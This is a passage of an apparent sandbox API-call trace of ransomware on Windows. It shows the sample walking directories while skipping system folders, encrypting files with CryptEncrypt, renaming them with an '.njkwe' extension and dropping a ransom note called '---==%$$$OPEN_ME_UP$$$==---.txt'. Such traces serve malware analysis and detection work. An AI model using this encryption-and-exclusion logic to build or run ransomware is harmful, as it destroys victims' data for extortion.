lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.765] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.765] GetTickCount () returned 0x114fdd9 [0061.765] GetTickCount () returned 0x114fdd9 [0061.765] GetTickCount () returned 0x114fdd9 [0061.765] GetTickCount () returned 0x114fdd9 [0061.765] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.766] GetProcessHeap () returned 0xbe0000 [0061.766] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.766] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xf13, lpOverlapped=0x0) returned 1 [0061.767] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff0ed, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.767] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xf13, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xf13, lpOverlapped=0x0) returned 1 [0061.767] GetProcessHeap () returned 0xbe0000 [0061.767] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.767] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.767] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.767] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.767] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.767] CloseHandle (hObject=0x42c) returned 1 [0061.820] GetProcessHeap () returned 0xbe0000 [0061.820] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.821] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.823] GetProcessHeap () returned 0xbe0000 [0061.823] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.823] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.823] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.823] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.823] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.823] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.823] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.823] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 48 [0061.823] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.823] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.823] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.823] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.823] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.823] GetTickCount () returned 0x114fe18 [0061.823] GetTickCount () returned 0x114fe18 [0061.823] GetTickCount () returned 0x114fe18 [0061.823] GetTickCount () returned 0x114fe18 [0061.823] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.823] GetProcessHeap () returned 0xbe0000 [0061.823] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.823] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.825] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.825] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.826] GetProcessHeap () returned 0xbe0000 [0061.826] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.826] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.826] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.826] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.826] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.826] CloseHandle (hObject=0x42c) returned 1 [0061.828] GetProcessHeap () returned 0xbe0000 [0061.828] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.828] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.828] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.829] GetProcessHeap () returned 0xbe0000 [0061.829] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.829] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.829] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.829] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.829] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.829] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.829] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.829] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 49 [0061.829] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.829] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.829] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.829] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.829] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.829] GetTickCount () returned 0x114fe18 [0061.830] GetTickCount () returned 0x114fe18 [0061.830] GetTickCount () returned 0x114fe18 [0061.830] GetTickCount () returned 0x114fe18 [0061.830] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.830] GetProcessHeap () returned 0xbe0000 [0061.830] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.830] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.832] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.832] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.832] GetProcessHeap () returned 0xbe0000 [0061.832] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.832] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.832] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.832] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.833] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.833] CloseHandle (hObject=0x42c) returned 1 [0061.834] GetProcessHeap () returned 0xbe0000 [0061.834] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.834] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.834] GetProcessHeap () returned 0xbe0000 [0061.834] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.834] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.834] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0061.835] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.835] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1055\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.835] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.836] CloseHandle (hObject=0x428) returned 1 [0061.836] GetProcessHeap () returned 0xbe0000 [0061.836] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.836] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="2052", cAlternateFileName="")) returned 1 [0061.836] lstrcmpiW (lpString1="2052", lpString2="Windows") returned -1 [0061.837] lstrcmpiW (lpString1="2052", lpString2="$Recycle.bin") returned 1 [0061.837] lstrcmpiW (lpString1="2052", lpString2="System Volume Information") returned -1 [0061.837] lstrcmpiW (lpString1="2052", lpString2="Program Files") returned -1 [0061.837] lstrcmpiW (lpString1="2052", lpString2="Program Files (x86)") returned -1 [0061.837] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052") returned 30 [0061.837] lstrcmpW (lpString1="2052", lpString2=".") returned 1 [0061.837] lstrcmpW (lpString1="2052", lpString2="..") returned 1 [0061.837] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.837] GetProcessHeap () returned 0xbe0000 [0061.837] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.837] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\*") returned 32 [0061.837] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0061.837] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.837] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.837] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.837] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.837] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.837] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\.") returned 32 [0061.837] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.837] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.837] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.837] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.837] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.837] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.837] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.837] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\..") returned 33 [0061.837] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.838] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.838] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.838] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.838] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.838] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.838] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.838] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.838] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 39 [0061.838] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.838] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.838] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.838] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.838] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.838] GetTickCount () returned 0x114fe28 [0061.838] GetTickCount () returned 0x114fe28 [0061.838] GetTickCount () returned 0x114fe28 [0061.838] GetTickCount () returned 0x114fe28 [0061.838] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.838] GetProcessHeap () returned 0xbe0000 [0061.838] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.838] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x16c3, lpOverlapped=0x0) returned 1 [0061.840] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffe93d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.840] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x16c3, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x16c3, lpOverlapped=0x0) returned 1 [0061.840] GetProcessHeap () returned 0xbe0000 [0061.840] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.840] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.840] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.840] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.840] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.840] CloseHandle (hObject=0x42c) returned 1 [0061.841] GetProcessHeap () returned 0xbe0000 [0061.841] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.841] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.843] GetProcessHeap () returned 0xbe0000 [0061.843] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.843] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.843] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.843] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.843] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.843] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.843] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") 